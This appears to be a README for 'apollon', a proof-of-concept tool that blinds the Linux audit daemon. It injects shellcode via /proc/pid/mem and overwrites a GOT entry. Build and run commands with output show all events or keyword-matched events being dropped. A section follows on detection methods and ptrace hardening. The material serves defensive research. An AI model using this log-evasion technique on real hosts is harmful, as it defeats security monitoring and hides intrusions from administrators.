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apollon


apollon is a proof of concept tool for blindsiding auditd. It works by patching the global offset table (GOT) of auditd via /proc/pid/mem and replacing the pointer to a libc function with a pointer to event filtering shellcode.

For patching auditd memory, root privileges are required. This method of tampering with auditd events have proven to be very stealthy. Monitoring /proc using auditd is not that easy and no suspicious events have been observed when running apollon against some popular auditd rule sets.

More technical details as well as detection and prevention guidance can be found within our blog post blindsiding auditd for fun and profit.

Usage


Since apollon is only a proof of concept, the supported functionalities are limited. apollon ships two different shellcodes that can be injected into auditd. The first one - filter-all.asm - filters all incoming events and completely blindsides auditd. With this payload, the only required argument is the PID of the auditd process:

[root@auditd apollon]$ make apollon-all-x64
gcc -c src/procmem.c -o procmem.o -O3 -I include -w -ldl
gcc -c src/utils.c -o utils.o -O3 -I include -w -ldl
nasm src/filter-all.asm -o shellcode-all.bin -f bin
python3 generate-header.py shellcode-all.bin
gcc -D FILTER_ALL -c src/apollon.c -o apollon-all-x64.o -O3 -I include -w -ldl
gcc procmem.o utils.o apollon-all-x64.o -o dist/apollon-all-x64 -O3 -I include -w -ldl
strip --strip-unneeded dist/apollon-all-x64

[root@auditd apollon]$ ./dist/apollon-all-x64 427
[+] Found data segment of 427 at 0x7482dd37d000
[+] Found libc base address of 427 at 0x7482dd04d000
[+] Found offset of 'recvfrom' in libc at e7cc0
[+] Searching for pattern 0x7482dd134cc0 in data segment of 427
[+] Data segment is 2000 bytes long.
[+] Found 'recvfrom' in 427 at 0x7482dd37dea0
[+] Preparing shellcode...
[+] Replaced 1 occurences of recvfrom.
[+] Searching codecave for 23 byte shellcode...
[+] Found code cave in 427 at 0x62bddc2bfaf1
[+] Wrtiting shellcode to codecave.
[+] Replacing 'recvfrom' GOT entry with shellcode addr.
[+] auditd patched successfully.

Afterwards, no more events should be logged by auditd. The second shellcode - filter-selective.asm - filters events based on a keyword. With this payload, a second argument is expected that will be used as a filter for auditd events. Each event containing the pattern will be dropped:

[root@auditd apollon]$ make apollon-selective-x64
gcc -c src/procmem.c -o procmem.o -O3 -I include -w -ldl
gcc -c src/utils.c -o utils.o -O3 -I include -w -ldl
nasm src/filter-selective.asm -o shellcode-selective.bin -f bin
python3 generate-header.py shellcode-selective.bin
gcc -c src/apollon.c -o apollon-selective-x64.o -O3 -I include -w -ldl
gcc procmem.o utils.o apollon-selective-x64.o -o dist/apollon-selective-x64 -O3 -I include -w -ldl
strip --strip-unneeded dist/apollon-selective-x64

[root@auditd apollon]$ ./dist/apollon-selective-x64 427 pid=1337
[+] Found data segment of 427 at 0x72e3428a4000
[+] Found libc base address of 427 at 0x72e342574000
[+] Found offset of 'recvfrom' in libc at e7cc0
[+] Searching for pattern 0x72e34265bcc0 in data segment of 427
[+] Data segment is 2000 bytes long.
[+] Found 'recvfrom' in 427 at 0x72e3428a4ea0
[+] Preparing shellcode...
[+] Replaced 2 occurences of recvfrom.
[+] Found strstr in 427 at 0x72e342600a30
[+] Replaced 1 occurences of strstr.
[+] Found strtoul in 427 at 0x72e34259a9c0
[+] Replaced 2 occurences of strtoul.
[+] Found code cave for pattern matching in 427 at 0x5fec525332ad
[+] Wrtiting 'pid=1337' to codecave.
[+] Replaced 1 occurences of matcher pattern.
[+] Searching codecave for 264 byte shellcode...
[+] Found code cave in 427 at 0x5fec5254baf1
[+] Wrtiting shellcode to codecave.
[+] Replacing 'recvfrom' GOT entry with shellcode addr.
[+] auditd patched successfully.

After the above patch, all events containing pid=1337 will be dropped. Since auditd events usually consist out of multiple audit messages, each audit message sharing the same event ID as the initially filtered message is also dropped.

Detection


A detailed technical discussion of apollon and some possible detection methods are discussed within our blog post blindsiding auditd for fun and profit. In this README, we only provide an overview of possible detection methods:

  1. Dynamically created auditd rules can be used to monitor /proc/pid/mem of critical processes. The following listing shows how this can be achieved for auditd by applying an adjustment to the auditd unit file:

    [Service]
    Type=forking
    PIDFile=/run/auditd.pid
    ExecStart=/sbin/auditd
    ExecStartPost=-/sbin/augenrules --load
    # The following line monitors write access to /proc/pid/mem of auditd
    ExecStartPost=/bin/bash -c "auditctl -w /proc/$(cat /run/auditd.pid)/mem -p wa -k process-injection"
    
  2. Monitor the auditd daemon for error messages. Simply clearing the netlink output buffer as done by apollon causes error messages as shown below:

    Jul 31 13:25:02 auditd auditd[427]: Netlink message from kernel was not OK
    Jul 31 13:25:02 auditd auditd[427]: Netlink message from kernel was not OK
    Jul 31 13:25:02 auditd auditd[427]: Netlink message from kernel was not OK
    Jul 31 13:25:02 auditd auditd[427]: Netlink message from kernel was not OK
    
  3. Look for missing event IDs in auditd logs. If certain event IDs are skipped, this may indicate tampering. The listing below shows an auditd log where one event was dropped by apollon:

    type=SYSCALL msg=audit(1690788664.304:980): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffe5e584772 a2=0 a3=0 items=1 ppid=1022 pid=1226 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4294967295 comm="cat" exe="/usr/bin/cat" key="etcpasswd"ARCH=x86_64 SYSCALL=openat AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root"
    type=PATH msg=audit(1690788664.304:980): item=0 name="/etc/shadow" inode=270575 dev=ca:03 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root"
    type=PROCTITLE msg=audit(1690788664.304:980): proctitle=636174002F6574632F736861646F77
    type=SYSCALL msg=audit(1690788671.579:982): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=7ffc22a71772 a2=0 a3=0 items=1 ppid=1022 pid=1228 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=4294967295 comm="cat" exe="/usr/bin/cat" key="etcpasswd"ARCH=x86_64 SYSCALL=openat AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root"
    type=PATH msg=audit(1690788671.579:982): item=0 name="/etc/shadow" inode=270575 dev=ca:03 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root"
    type=PROCTITLE msg=audit(1690788671.579:982): proctitle=636174002F6574632F736861646F77
    
  4. If possible, restrict ptrace permissions e.g. by using a Linux Security Module. Yama represents one option to globally prevent access to /proc/pid/mem by configuring a restrictive ptrace_scope. If globally disabling ptrace is not an option, you may can prevent ptrace access to critical processes by writing a custom Linux Security Module.

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Proof-of-Concept to evade auditd by writing /proc/PID/mem

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